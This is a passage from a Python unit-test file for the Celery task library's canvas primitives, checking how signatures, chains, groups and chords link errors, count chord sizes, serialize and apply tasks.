new_options = sig._merge(options={"group_id": sentinel.new_gid}) assert new_options == {"group_id": sentinel.old_gid} def test_set_immutable(self): x = self.add.s(2, 2) assert not x.immutable x.set(immutable=True) assert x.immutable x.set(immutable=False) assert not x.immutable def test_election(self): x = self.add.s(2, 2) x.freeze('foo') x.type.app.control = Mock() r = x.election() x.type.app.control.election.assert_called() assert r.id == 'foo' def test_AsyncResult_when_not_registered(self): s = signature('xxx.not.registered', app=self.app) assert s.AsyncResult def test_apply_async_when_not_registered(self): s = signature('xxx.not.registered', app=self.app) assert s._apply_async def test_keeping_link_error_on_chaining(self): x = self.add.s(2, 2) | self.mul.s(4) assert isinstance(x, _chain) x.link_error(SIG) assert SIG in x.options['link_error'] t = signature(SIG) z = x | t assert isinstance(z, _chain) assert t in z.tasks assert not z.options.get('link_error') assert SIG in z.tasks[0].options['link_error'] assert not z.tasks[2].options.get('link_error') assert SIG in x.options['link_error'] assert t not in x.tasks assert not x.tasks[0].options.get('link_error') z = t | x assert isinstance(z, _chain) assert t in z.tasks assert not z.options.get('link_error') assert SIG in z.tasks[1].options['link_error'] assert not z.tasks[0].options.get('link_error') assert SIG in x.options['link_error'] assert t not in x.tasks assert not x.tasks[0].options.get('link_error') y = self.add.s(4, 4) | self.div.s(2) assert isinstance(y, _chain) z = x | y assert isinstance(z, _chain) assert not z.options.get('link_error') assert SIG in z.tasks[0].options['link_error'] assert not z.tasks[2].options.get('link_error') assert SIG in x.options['link_error'] assert not x.tasks[0].options.get('link_error') z = y | x assert isinstance(z, _chain) assert not z.options.get('link_error') assert SIG in z.tasks[3].options['link_error'] assert not z.tasks[1].options.get('link_error') assert SIG in x.options['link_error'] assert not x.tasks[0].options.get('link_error') class test_xmap_xstarmap(CanvasCase): def test_apply(self): for type, attr in [(xmap, 'map'), (xstarmap, 'starmap')]: args = [(i, i) for i in range(10)] s = getattr(self.add, attr)(args) s.type = Mock() s.apply_async(foo=1) s.type.apply_async.assert_called_with( (), {'task': self.add.s(), 'it': args}, foo=1, route_name=self.add.name, ) assert type.from_dict(dict(s)) == s assert repr(s) class test_chunks(CanvasCase): def test_chunks(self): x = self.add.chunks(range(100), 10) assert dict(chunks.from_dict(dict(x), app=self.app)) == dict(x) assert x.group() assert len(x.group().tasks) == 10 x.group = Mock() gr = x.group.return_value = Mock() x.apply_async() gr.apply_async.assert_called_with((), {}, route_name=self.add.name) gr.apply_async.reset_mock() x() gr.apply_async.assert_called_with((), {}, route_name=self.add.name) self.app.conf.task_always_eager = True chunks.apply_chunks(app=self.app, **x['kwargs']) class test_chain(CanvasCase): def test_chain_of_chain_with_a_single_task(self): s = self.add.s(1, 1) assert chain([chain(s)]).tasks == list(chain(s).tasks) def test_clone_preserves_state(self): x = chain(self.add.s(i, i) for i in range(10)) assert x.clone().tasks == x.tasks assert x.clone().kwargs == x.kwargs assert x.clone().args == x.args def test_repr(self): x = self.add.s(2, 2) | self.add.s(2) assert repr(x) == f'{self.add.name}(2, 2) | add(2)' def test_apply_async(self): c = self.add.s(2, 2) | self.add.s(4) | self.add.s(8) result = c.apply_async() assert result.parent assert result.parent.parent assert result.parent.parent.parent is None def test_splices_chains(self): c = chain( self.add.s(5, 5), chain(self.add.s(6), self.add.s(7), self.add.s(8), app=self.app), app=self.app, ) c.freeze() tasks, _ = c._frozen assert len(tasks) == 4 def test_from_dict_no_tasks(self): assert chain.from_dict(dict(chain(app=self.app)), app=self.app) def test_from_dict_full_subtasks(self): c = chain(self.add.si(1, 2), self.add.si(3, 4), self.add.si(5, 6)) serialized = json.loads(json.dumps(c)) deserialized = chain.from_dict(serialized) assert all(isinstance(task, Signature) for task in deserialized.tasks) @pytest.mark.usefixtures('depends_on_current_app') def test_app_falls_back_to_default(self): from celery._state import current_app assert chain().app is current_app def test_handles_dicts(self): c = chain( self.add.s(5, 5), dict(self.add.s(8)), app=self.app, ) c.freeze() tasks, _ = c._frozen assert all(isinstance(task, Signature) for task in tasks) assert all(task.app is self.app for task in tasks) def test_groups_in_chain_to_chord(self): g1 = group([self.add.s(2, 2), self.add.s(4, 4)]) g2 = group([self.add.s(3, 3), self.add.s(5, 5)]) c = g1 | g2 assert isinstance(c, chord) def test_group_to_chord(self): c = ( self.add.s(5) | group([self.add.s(i, i) for i in range(5)], app=self.app) | self.add.s(10) | self.add.s(20) | self.add.s(30) ) c._use_link = True tasks, results = c.prepare_steps((), {}, c.tasks) assert tasks[-1].args[0] == 5 assert isinstance(tasks[-2], chord) assert len(tasks[-2].tasks) == 5 body = tasks[-2].body assert len(body.tasks) == 3 assert body.tasks[0].args[0] == 10 assert body.tasks[1].args[0] == 20 assert body.tasks[2].args[0] == 30 c2 = self.add.s(2, 2) | group(self.add.s(i, i) for i in range(10)) c2._use_link = True tasks2, _ = c2.prepare_steps((), {}, c2.tasks) assert isinstance(tasks2[0], group) def test_group_to_chord__protocol_2__or(self): c = ( group([self.add.s(i, i) for i in range(5)], app=self.app) | self.add.s(10) | self.add.s(20) | self.add.s(30) ) assert isinstance(c, chord) def test_group_to_chord__protocol_2(self): c = chain( group([self.add.s(i, i) for i in range(5)], app=self.app), self.add.s(10), self.add.s(20), self.add.s(30) ) assert isinstance(c, chord) assert isinstance(c.body, _chain) assert len(c.body.tasks) == 3 c2 = self.add.s(2, 2) | group(self.add.s(i, i) for i in range(10)) c2._use_link = False tasks2, _ = c2.prepare_steps((), {}, c2.tasks) assert isinstance(tasks2[0], group) def test_chord_to_chain(self): c = ( chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')], self.add.s(['foo'])) | chain(self.add.s(['y']), self.add.s(['z'])) ) assert isinstance(c, _chain) assert c.apply().get() == ['x0y0', 'x1y1', 'foo', 'y', 'z'] def test_chord_to_group(self): c = ( chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')], self.add.s(['foo'])) | group([self.add.s(['y']), self.add.s(['z'])]) ) assert isinstance(c, _chain) assert c.apply().get() == [ ['x0y0', 'x1y1', 'foo', 'y'], ['x0y0', 'x1y1', 'foo', 'z'] ] def test_apply_options(self): class static(Signature): def clone(self, *args, **kwargs): return self def s(*args, **kwargs): return static(self.add, args, kwargs, type=self.add, app=self.app) c = s(2, 2) | s(4) | s(8) r1 = c.apply_async(task_id='some_id') assert r1.id == 'some_id' c.apply_async(group_id='some_group_id') assert c.tasks[-1].options['group_id'] == 'some_group_id' c.apply_async(chord='some_chord_id') assert c.tasks[-1].options['chord'] == 'some_chord_id' c.apply_async(link=[s(32)]) assert c.tasks[-1].options['link'] == [s(32)] c.apply_async(link_error=[s('error')]) for task in c.tasks: assert task.options['link_error'] == [s('error')] def test_apply_options_none(self): class static(Signature): def clone(self, *args, **kwargs): return self def _apply_async(self, *args, **kwargs): self.args = args self.kwargs = kwargs c = static(self.add, (2, 2), type=self.add, app=self.app, priority=5) c.apply_async(priority=4) assert c.kwargs['priority'] == 4 c.apply_async(priority=None) assert c.kwargs['priority'] == 5 def test_reverse(self): x = self.add.s(2, 2) | self.add.s(2) assert isinstance(signature(x), _chain) assert isinstance(signature(dict(x)), _chain) def test_always_eager(self): self.app.conf.task_always_eager = True assert ~(self.add.s(4, 4) | self.add.s(8)) == 16 def test_chain_always_eager(self): self.app.conf.task_always_eager = True from celery import _state, result fixture_task_join_will_block = _state.task_join_will_block try: _state.task_join_will_block = _state.orig_task_join_will_block result.task_join_will_block = _state.orig_task_join_will_block @self.app.task(shared=False) def chain_add(): return (self.add.s(4, 4) | self.add.s(8)).apply_async() r = chain_add.apply_async(throw=True).get() assert r.get() == 16 finally: _state.task_join_will_block = fixture_task_join_will_block result.task_join_will_block = fixture_task_join_will_block def test_apply(self): x = chain(self.add.s(4, 4), self.add.s(8), self.add.s(10)) res = x.apply() assert isinstance(res, EagerResult) assert res.get() == 26 assert res.parent.get() == 16 assert res.parent.parent.get() == 8 assert res.parent.parent.parent is None def test_kwargs_apply(self): x = chain(self.add.s(), self.add.s(8), self.add.s(10)) res = x.apply(kwargs={'x': 1, 'y': 1}).get() assert res == 20 def test_single_expresion(self): x = chain(self.add.s(1, 2)).apply() assert x.get() == 3 assert x.parent is None def test_empty_chain_returns_none(self): assert chain(app=self.app)() is None assert chain(app=self.app).apply_async() is None def test_call_no_tasks(self): x = chain() assert not x() def test_call_with_tasks(self): x = self.add.s(2, 2) | self.add.s(4) x.apply_async = Mock() x(2, 2, foo=1) x.apply_async.assert_called_with((2, 2), {'foo': 1}) def test_from_dict_no_args__with_args(self): x = dict(self.add.s(2, 2) | self.add.s(4)) x['args'] = None assert isinstance(chain.from_dict(x), _chain) x['args'] = (2,) assert isinstance(chain.from_dict(x), _chain) def test_accepts_generator_argument(self): x = chain(self.add.s(i) for i in range(10)) assert x.tasks[0].type, self.add assert x.type def test_chord_sets_result_parent(self): g = (self.add.s(0, 0) | group(self.add.s(i, i) for i in range(1, 10)) | self.add.s(2, 2) | self.add.s(4, 4)) res = g.freeze() assert isinstance(res, AsyncResult) assert not isinstance(res, GroupResult) assert isinstance(res.parent, AsyncResult) assert not isinstance(res.parent, GroupResult) assert isinstance(res.parent.parent, GroupResult) assert isinstance(res.parent.parent.parent, AsyncResult) assert not isinstance(res.parent.parent.parent, GroupResult) assert res.parent.parent.parent.parent is None seen = set() node = res while node: assert node.id not in seen seen.add(node.id) node = node.parent def test_append_to_empty_chain(self): x = chain() x |= self.add.s(1, 1) x |= self.add.s(1) x.freeze() tasks, _ = x._frozen assert len(tasks) == 2 assert x.apply().get() == 3 @pytest.mark.usefixtures('depends_on_current_app') def test_chain_single_child_result(self): child_sig = self.add.si(1, 1) chain_sig = chain(child_sig) assert chain_sig.tasks[0] is child_sig with patch.object( # We want to get back the result of actually applying the task child_sig, "apply_async", ) as mock_apply, patch.object( # The child signature may be clone by `chain.prepare_steps()` child_sig, "clone", return_value=child_sig, ): res = chain_sig() # `_prepare_chain_from_options()` sets this `chain` kwarg with the # subsequent tasks which would be run - nothing in this case mock_apply.assert_called_once_with(chain=[]) assert res is mock_apply.return_value @pytest.mark.usefixtures('depends_on_current_app') def test_chain_single_child_group_result(self): child_sig = self.add.si(1, 1) # The group will `clone()` the child during instantiation so mock it with patch.object(child_sig, "clone", return_value=child_sig): group_sig = group(child_sig) # Now we can construct the chain signature which is actually under test chain_sig = chain(group_sig) assert chain_sig.tasks[0].tasks[0] is child_sig with patch.object( # We want to get back the result of actually applying the task child_sig, "apply_async", ) as mock_apply, patch.object( # The child signature may be clone by `chain.prepare_steps()` child_sig, "clone", return_value=child_sig, ): res = chain_sig() # `_prepare_chain_from_options()` sets this `chain` kwarg with the # subsequent tasks which would be run - nothing in this case mock_apply.assert_called_once_with(chain=[]) assert res is mock_apply.return_value class test_group(CanvasCase): def test_repr(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) assert repr(x) def test_reverse(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) assert isinstance(signature(x), group) assert isinstance(signature(dict(x)), group) def test_cannot_link_on_group(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) with pytest.raises(TypeError): x.apply_async(link=self.add.s(2, 2)) def test_cannot_link_error_on_group(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) with pytest.raises(TypeError): x.apply_async(link_error=self.add.s(2, 2)) def test_group_with_group_argument(self): g1 = group(self.add.s(2, 2), self.add.s(4, 4), app=self.app) g2 = group(g1, app=self.app) assert g2.tasks is g1.tasks def test_maybe_group_sig(self): assert _maybe_group(self.add.s(2, 2), self.app) == [self.add.s(2, 2)] def test_apply(self): x = group([self.add.s(4, 4), self.add.s(8, 8)]) res = x.apply() assert res.get(), [8 == 16] def test_apply_async(self): x = group([self.add.s(4, 4), self.add.s(8, 8)]) x.apply_async() def test_prepare_with_dict(self): x = group([self.add.s(4, 4), dict(self.add.s(8, 8))], app=self.app) x.apply_async() def test_group_in_group(self): g1 = group(self.add.s(2, 2), self.add.s(4, 4), app=self.app) g2 = group(self.add.s(8, 8), g1, self.add.s(16, 16), app=self.app) g2.apply_async() def test_set_immutable(self): g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app) g1.set_immutable(True) for task in g1.tasks: task.set_immutable.assert_called_with(True) def test_link(self): g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app) sig = Mock(name='sig') g1.link(sig) # Only the first child signature of a group will be given the callback # and it is cloned and made immutable to avoid passing results to it, # since that first task can't pass along its siblings' return values g1.tasks[0].link.assert_called_with(sig.clone().set(immutable=True)) def test_link_error(self): g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app) sig = Mock(name='sig') g1.link_error(sig) # We expect that all group children will be given the errback to ensure # it gets called for child_sig in g1.tasks: child_sig.link_error.assert_called_with(sig) def test_apply_empty(self): x = group(app=self.app) x.apply() res = x.apply_async() assert res assert not res.results def test_apply_async_with_parent(self): _task_stack.push(self.add) try: self.add.push_request(called_directly=False) try: assert not self.add.request.children x = group([self.add.s(4, 4), self.add.s(8, 8)]) res = x() assert self.add.request.children assert res in self.add.request.children assert len(self.add.request.children) == 1 finally: self.add.pop_request() finally: _task_stack.pop() def test_from_dict(self): x = group([self.add.s(2, 2), self.add.s(4, 4)]) x['args'] = (2, 2) assert group.from_dict(dict(x)) x['args'] = None assert group.from_dict(dict(x)) def test_from_dict_deep_deserialize(self): original_group = group([self.add.s(1, 2)] * 42) serialized_group = json.loads(json.dumps(original_group)) deserialized_group = group.from_dict(serialized_group) assert all( isinstance(child_task, Signature) for child_task in deserialized_group.tasks ) def test_from_dict_deeper_deserialize(self): inner_group = group([self.add.s(1, 2)] * 42) outer_group = group([inner_group] * 42) serialized_group = json.loads(json.dumps(outer_group)) deserialized_group = group.from_dict(serialized_group) assert all( isinstance(child_task, Signature) for child_task in deserialized_group.tasks ) assert all( isinstance(grandchild_task, Signature) for child_task in deserialized_group.tasks for grandchild_task in child_task.tasks ) def test_call_empty_group(self): x = group(app=self.app) assert not len(x()) x.delay() x.apply_async() x() def test_skew(self): g = group([self.add.s(i, i) for i in range(10)]) g.skew(start=1, stop=10, step=1) for i, task in enumerate(g.tasks): assert task.options['countdown'] == i + 1 def test_iter(self): g = group([self.add.s(i, i) for i in range(10)]) assert list(iter(g)) == list(g.keys()) def test_single_task(self): g = group([self.add.s(1, 1)]) assert isinstance(g, group) assert len(g.tasks) == 1 g = group(self.add.s(1, 1)) assert isinstance(g, group) assert len(g.tasks) == 1 @staticmethod def helper_test_get_delay(result): import time t0 = time.time() while not result.ready(): time.sleep(0.01) if time.time() - t0 > 1: return None return result.get() def test_kwargs_direct(self): res = [self.add(x=1, y=1), self.add(x=1, y=1)] assert res == [2, 2] def test_kwargs_apply(self): x = group([self.add.s(), self.add.s()]) res = x.apply(kwargs={'x': 1, 'y': 1}).get() assert res == [2, 2] def test_kwargs_apply_async(self): self.app.conf.task_always_eager = True x = group([self.add.s(), self.add.s()]) res = self.helper_test_get_delay( x.apply_async(kwargs={'x': 1, 'y': 1}) ) assert res == [2, 2] def test_kwargs_delay(self): self.app.conf.task_always_eager = True x = group([self.add.s(), self.add.s()]) res = self.helper_test_get_delay(x.delay(x=1, y=1)) assert res == [2, 2] def test_kwargs_delay_partial(self): self.app.conf.task_always_eager = True x = group([self.add.s(1), self.add.s(x=1)]) res = self.helper_test_get_delay(x.delay(y=1)) assert res == [2, 2] def test_apply_from_generator(self): child_count = 42 child_sig = self.add.si(0, 0) child_sigs_gen = (child_sig for _ in range(child_count)) group_sig = group(child_sigs_gen) with patch("celery.canvas.Signature.apply_async") as mock_apply_async: res_obj = group_sig.apply_async() assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # This needs the current app for some reason not worth digging into @pytest.mark.usefixtures('depends_on_current_app') def test_apply_from_generator_empty(self): empty_gen = (False for _ in range(0)) group_sig = group(empty_gen) with patch("celery.canvas.Signature.apply_async") as mock_apply_async: res_obj = group_sig.apply_async() assert mock_apply_async.call_count == 0 assert len(res_obj.children) == 0 # In the following tests, getting the group ID is a pain so we just use # `ANY` to wildcard it when we're checking on calls made to our mocks def test_apply_contains_chord(self): gchild_count = 42 gchild_sig = self.add.si(0, 0) gchild_sigs = (gchild_sig, ) * gchild_count child_chord = chord(gchild_sigs, gchild_sig) group_sig = group((child_chord, )) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == gchild_count assert len(res_obj.children) == len(group_sig.tasks) # We must have set the chord size for the group of tasks which makes up # the header of the `child_chord`, just before we apply the last task. mock_set_chord_size.assert_called_once_with(ANY, gchild_count) def test_apply_contains_chords_containing_chain(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) gchild_sig = chain((ggchild_sig, ) * ggchild_count) child_count = 24 child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the encapsulated chains - in this case 1 for each child chord mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count) @pytest.mark.xfail(reason="Invalid canvas setup with bad exception") def test_apply_contains_chords_containing_empty_chain(self): gchild_sig = chain(tuple()) child_count = 24 child_chord = chord((gchild_sig, ), self.add.si(0, 0)) group_sig = group((child_chord, ) * child_count) # This is an invalid setup because we can't complete a chord header if # there are no actual tasks which will run in it. However, the current # behaviour of an `IndexError` isn't particularly helpful to a user. group_sig.apply_async() def test_apply_contains_chords_containing_chain_with_empty_tail(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) tail_count = 24 gchild_sig = chain( (ggchild_sig, ) * ggchild_count + (group((ggchild_sig, ) * tail_count), group(tuple()), ), ) child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, )) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == 1 assert len(res_obj.children) == 1 # We must have set the chord sizes based on the size of the last # non-empty task in the encapsulated chains - in this case `tail_count` # for the group preceding the empty one in each grandchild chain mock_set_chord_size.assert_called_once_with(ANY, tail_count) def test_apply_contains_chords_containing_group(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) gchild_sig = group((ggchild_sig, ) * ggchild_count) child_count = 24 child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We see applies for all of the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count * ggchild_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the encapsulated groups - in this case `ggchild_count` mock_set_chord_size.assert_has_calls( (call(ANY, ggchild_count), ) * child_count, ) @pytest.mark.xfail(reason="Invalid canvas setup but poor behaviour") def test_apply_contains_chords_containing_empty_group(self): gchild_sig = group(tuple()) child_count = 24 child_chord = chord((gchild_sig, ), self.add.si(0, 0)) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # This is actually kind of meaningless because, similar to the empty # chain test, this is an invalid setup. However, we should probably # expect that the chords are dealt with in some other way the probably # being left incomplete forever... mock_set_chord_size.assert_has_calls((call(ANY, 0), ) * child_count) def test_apply_contains_chords_containing_chord(self): ggchild_count = 42 ggchild_sig = self.add.si(0, 0) gchild_sig = chord((ggchild_sig, ) * ggchild_count, ggchild_sig) child_count = 24 child_chord = chord((gchild_sig, ), ggchild_sig) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We see applies for all of the header great-grandchildren because the # tasks are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count * ggchild_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the deeply encapsulated chords' header tasks, as well as for each # child chord. This means we have `child_count` interleaved calls to # set chord sizes of 1 and `ggchild_count`. mock_set_chord_size.assert_has_calls( (call(ANY, 1), call(ANY, ggchild_count), ) * child_count, ) def test_apply_contains_chords_containing_empty_chord(self): gchild_sig = chord(tuple(), self.add.si(0, 0)) child_count = 24 child_chord = chord((gchild_sig, ), self.add.si(0, 0)) group_sig = group((child_chord, ) * child_count) with patch.object( self.app.backend, "set_chord_size", ) as mock_set_chord_size, patch( "celery.canvas.Signature.apply_async", ) as mock_apply_async: res_obj = group_sig.apply_async() # We only see applies for the header grandchildren because the tasks # are never actually run due to our mocking of `apply_async()` assert mock_apply_async.call_count == child_count assert len(res_obj.children) == child_count # We must have set the chord sizes based on the number of tail tasks of # the encapsulated chains - in this case 1 for each child chord mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count) class test_chord(CanvasCase): def test__get_app_does_not_exhaust_generator(self): def build_generator(): yield self.add.s(1, 1) self.second_item_returned = True yield self.add.s(2, 2) raise pytest.fail("This should never be reached") self.second_item_returned = False c = chord(build_generator(), self.add.s(3)) c.app # The second task gets returned due to lookahead in `regen()` assert self.second_item_returned # Access it again to make sure the generator is not further evaluated c.app def test_reverse(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) assert isinstance(signature(x), chord) assert isinstance(signature(dict(x)), chord) def test_clone_clones_body(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) y = x.clone() assert x.kwargs['body'] is not y.kwargs['body'] y.kwargs.pop('body') z = y.clone() assert z.kwargs.get('body') is None def test_argument_is_group(self): x = chord(group(self.add.s(2, 2), self.add.s(4, 4), app=self.app)) assert x.tasks def test_app_when_app(self): app = Mock(name='app') x = chord([self.add.s(4, 4)], app=app) assert x.app is app def test_app_when_app_in_task(self): t1 = Mock(name='t1') t2 = Mock(name='t2') x = chord([t1, self.add.s(4, 4)]) assert x.app is x.tasks[0].app t1.app = None x = chord([t1], body=t2) assert x.app is t2._app def test_app_when_header_is_empty(self): x = chord([], self.add.s(4, 4)) assert x.app is self.add.app @pytest.mark.usefixtures('depends_on_current_app') def test_app_fallback_to_current(self): from celery._state import current_app t1 = Mock(name='t1') t1.app = t1._app = None x = chord([t1], body=t1) assert x.app is current_app def test_chord_size_simple(self): sig = chord(self.add.s()) assert sig.__length_hint__() == 1 def test_chord_size_with_body(self): sig = chord(self.add.s(), self.add.s()) assert sig.__length_hint__() == 1 def test_chord_size_explicit_group_single(self): sig = chord(group(self.add.s())) assert sig.__length_hint__() == 1 def test_chord_size_explicit_group_many(self): sig = chord(group([self.add.s()] * 42)) assert sig.__length_hint__() == 42 def test_chord_size_implicit_group_single(self): sig = chord([self.add.s()]) assert sig.__length_hint__() == 1 def test_chord_size_implicit_group_many(self): sig = chord([self.add.s()] * 42) assert sig.__length_hint__() == 42 def test_chord_size_chain_single(self): sig = chord(chain(self.add.s())) assert sig.__length_hint__() == 1 def test_chord_size_chain_many(self): # Chains get flattened into the encapsulating chord so even though the # chain would only count for 1, the tasks we pulled into the chord's # header and are counted as a bunch of simple signature objects sig = chord(chain([self.add.s()] * 42)) assert sig.__length_hint__() == 42 def test_chord_size_nested_chain_chain_single(self): sig = chord(chain(chain(self.add.s()))) assert sig.__length_hint__() == 1 def test_chord_size_nested_chain_chain_many(self): # The outer chain will be pulled up into the chord but the lower one # remains and will only count as a single final element sig = chord(chain(chain([self.add.s()] * 42))) assert sig.__length_hint__() == 1 def test_chord_size_implicit_chain_single(self): sig = chord([self.add.s()]) assert sig.__length_hint__() == 1 def test_chord_size_implicit_chain_many(self): # This isn't a chain object so the `tasks` attribute can't be lifted # into the chord - this isn't actually valid and would blow up we tried # to run it but it sanity checks our recursion sig = chord([[self.add.s()] * 42]) assert sig.__length_hint__() == 1 def test_chord_size_nested_implicit_chain_chain_single(self): sig = chord([chain(self.add.s())]) assert sig.__length_hint__() == 1 def test_chord_size_nested_implicit_chain_chain_many(self): sig = chord([chain([self.add.s()] * 42)]) assert sig.__length_hint__() == 1 def test_chord_size_nested_chord_body_simple(self): sig = chord(chord(tuple(), self.add.s())) assert sig.__length_hint__() == 1 def test_chord_size_nested_chord_body_implicit_group_single(self): sig = chord(chord(tuple(), [self.add.s()])) assert sig.__length_hint__() == 1 def test_chord_size_nested_chord_body_implicit_group_many(self): sig = chord(chord(tuple(), [self.add.s()] * 42)) assert sig.__length_hint__() == 42 # Nested groups in a chain only affect the chord size if they are the last # element in the chain - in that case each group element is counted def test_chord_size_nested_group_chain_group_head_single(self): x = chord( group( [group(self.add.s()) | self.add.s()] * 42 ), body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_group_chain_group_head_many(self): x = chord( group( [group([self.add.s()] * 4) | self.add.s()] * 2 ), body=self.add.s() ) assert x.__length_hint__() == 2 def test_chord_size_nested_group_chain_group_mid_single(self): x = chord( group( [self.add.s() | group(self.add.s()) | self.add.s()] * 42 ), body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_group_chain_group_mid_many(self): x = chord( group( [self.add.s() | group([self.add.s()] * 4) | self.add.s()] * 2 ), body=self.add.s() ) assert x.__length_hint__() == 2 def test_chord_size_nested_group_chain_group_tail_single(self): x = chord( group( [self.add.s() | group(self.add.s())] * 42 ), body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_group_chain_group_tail_many(self): x = chord( group( [self.add.s() | group([self.add.s()] * 4)] * 2 ), body=self.add.s() ) assert x.__length_hint__() == 4 * 2 def test_chord_size_nested_implicit_group_chain_group_tail_single(self): x = chord( [self.add.s() | group(self.add.s())] * 42, body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_implicit_group_chain_group_tail_many(self): x = chord( [self.add.s() | group([self.add.s()] * 4)] * 2, body=self.add.s() ) assert x.__length_hint__() == 4 * 2 def test_chord_size_deserialized_element_single(self): child_sig = self.add.s() deserialized_child_sig = json.loads(json.dumps(child_sig)) # We have to break in to be sure that a child remains as a `dict` so we # can confirm that the length hint will instantiate a `Signature` # object and then descend as expected chord_sig = chord(tuple()) chord_sig.tasks = [deserialized_child_sig] with patch( "celery.canvas.Signature.from_dict", return_value=child_sig ) as mock_from_dict: assert chord_sig. __length_hint__() == 1 mock_from_dict.assert_called_once_with(deserialized_child_sig) def test_chord_size_deserialized_element_many(self): child_sig = self.add.s() deserialized_child_sig = json.loads(json.dumps(child_sig)) # We have to break in to be sure that a child remains as a `dict` so we # can confirm that the length hint will instantiate a `Signature` # object and then descend as expected chord_sig = chord(tuple()) chord_sig.tasks = [deserialized_child_sig] * 42 with patch( "celery.canvas.Signature.from_dict", return_value=child_sig ) as mock_from_dict: assert chord_sig. __length_hint__() == 42 mock_from_dict.assert_has_calls([call(deserialized_child_sig)] * 42) def test_set_immutable(self): x = chord([Mock(name='t1'), Mock(name='t2')], app=self.app) x.set_immutable(True) def test_links_to_body(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) x.link(self.div.s(2)) assert not x.options.get('link') assert x.kwargs['body'].options['link'] x.link_error(self.div.s(2)) assert not x.options.get('link_error') assert x.kwargs['body'].options['link_error'] assert x.tasks assert x.body def test_repr(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) assert repr(x) x.kwargs['body'] = None assert 'without body' in repr(x) def test_freeze_tasks_body_is_group(self, subtests): # Confirm that `group index` values counting up from 0 are set for # elements of a chord's body when the chord is encapsulated in a group body_elem = self.add.s() chord_body = group([body_elem] * 42) chord_obj = chord(self.add.s(), body=chord_body) top_group = group([chord_obj]) # We expect the body to be the signature we passed in before we freeze with subtests.test(msg="Validate body tasks are retained"): assert all( embedded_body_elem is body_elem for embedded_body_elem in chord_obj.body.tasks ) # We also expect the body to have no initial options - since all of the # embedded body elements are confirmed to be `body_elem` this is valid assert body_elem.options == {} # When we freeze the chord, its body will be cloned and options set top_group.freeze() with subtests.test( msg="Validate body group indices count from 0 after freezing" ): assert all( embedded_body_elem is not body_elem for embedded_body_elem in chord_obj.body.tasks ) assert all( embedded_body_elem.options["group_index"] == i for i, embedded_body_elem in enumerate(chord_obj.body.tasks) ) def test_freeze_tasks_is_not_group(self): x = chord([self.add.s(2, 2)], body=self.add.s(), app=self.app) x.freeze() x.tasks = [self.add.s(2, 2)] x.freeze() def test_chain_always_eager(self): self.app.conf.task_always_eager = True from celery import _state, result fixture_task_join_will_block = _state.task_join_will_block try: _state.task_join_will_block = _state.orig_task_join_will_block result.task_join_will_block = _state.orig_task_join_will_block @self.app.task(shared=False) def finalize(*args): pass @self.app.task(shared=False) def chord_add(): return chord([self.add.s(4, 4)], finalize.s()).apply_async() chord_add.apply_async(throw=True).get() finally: _state.task_join_will_block = fixture_task_join_will_block result.task_join_will_block = fixture_task_join_will_block def test_from_dict(self): header = self.add.s(1, 2) original_chord = chord(header=header) rebuilt_chord = chord.from_dict(dict(original_chord)) assert isinstance(rebuilt_chord, chord) def test_from_dict_with_body(self): header = body = 